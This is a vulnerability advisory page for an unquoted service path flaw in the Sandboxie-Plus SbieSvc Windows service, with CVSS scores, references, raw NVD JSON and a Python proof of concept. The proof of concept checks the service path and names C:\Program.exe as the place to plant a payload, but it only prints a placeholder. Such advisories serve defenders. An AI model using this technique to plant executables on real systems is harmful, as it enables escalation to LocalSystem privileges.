Security Vulnerability Report
CVE-2022-50920 CVSS 8.4 HIGH

CVE-2022-50920

Published: 2026-01-13 23:15:56
Last Modified: 2026-04-15 00:35:42

Description

Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Sandboxie-Plus < 5.50.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2022-50920 PoC - Sandboxie-Plus SbieSvc Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability
# Run with administrator privileges

import os
import subprocess
import sys


def check_vulnerability():
    """Check if the system is vulnerable to CVE-2022-50920"""
    try:
        # Query the SbieSvc service configuration
        result = subprocess.run(
            ['sc', 'qc', 'SbieSvc'],
            capture_output=True,
            text=True
        )

        if 'BINARY_PATH_NAME' in result.stdout:
            print('[+] SbieSvc service found')
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f'[+] Current path: {path}')

                    # A quoted image path may be followed by arguments,
                    # so only the leading quote is checked
                    if path.startswith('"'):
                        print('[-] NOT VULNERABLE: Path is properly quoted')
                        return False

                    # Only spaces inside the executable path matter,
                    # not the space that separates it from its arguments
                    exe_end = path.lower().find('.exe')
                    image = path if exe_end == -1 else path[:exe_end + 4]
                    if ' ' in image:
                        print('[!] VULNERABLE: Path is unquoted and contains spaces')
                        return True

                    print('[-] NOT VULNERABLE: Unquoted path contains no spaces')
                    return False
            # BINARY_PATH_NAME appeared in the output but not on a line of its own
            return False
        else:
            print('[-] SbieSvc service not found')
            return False
    except Exception as e:
        print(f'[-] Error: {e}')
        return False


def create_payload():
    """Create a malicious executable to be placed at unquoted path location"""
    payload_path = r'C:\Program.exe'

    # This is a placeholder - actual payload would be malicious code
    # For demonstration purposes only; nothing is written to disk
    print(f'[!] Would create malicious executable at: {payload_path}')
    print('[!] When SbieSvc starts, it would execute this payload with LocalSystem privileges')

    return payload_path


if __name__ == '__main__':
    print('CVE-2022-50920 - Sandboxie-Plus SbieSvc Unquoted Service Path PoC')
    print('=' * 60)

    check_vulnerability()
    create_payload()

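References

https://sandboxie-plus.com/
https://www.exploit-db.com/exploits/50819
https://www.vulncheck.com/advisories/sandboxie-plus-service-sbiesvc-unquoted-service-path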

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50920", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup."}, {"lang": "es", "value": "Sandboxie-Plus 5.50.2 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio de Windows SbieSvc que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se ejecutarán con privilegios de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://sandboxie-plus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50819", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sandboxie-plus-service-sbiesvc-unquoted-service-path", "source": "[email protected]"}]}}